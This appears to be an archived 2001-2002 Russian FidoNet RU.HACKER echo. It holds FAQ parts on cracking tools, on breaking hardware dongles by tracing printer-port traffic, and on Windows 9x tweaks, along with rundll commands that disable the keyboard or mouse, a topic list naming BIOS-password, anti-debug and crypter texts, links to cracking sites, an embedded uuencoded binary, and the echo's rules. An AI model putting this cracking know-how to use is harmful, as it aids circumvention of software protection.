│ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2380 [1-10330] From : Mike Zhuravlev 25-Mar-02 00:03:27 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2381 [1-10330] From : Mike Zhuravlev 25-Mar-02 00:03:27 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2382 [1-10330] From : Mike Zhuravlev 25-Mar-02 00:03:28 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2383 [1-10330] From : Moderator of RU.HACKER 01-Apr-02 07:48:40 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2384 [1-10330] From : Moderator of RU.HACKER 01-Apr-02 07:48:40 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в 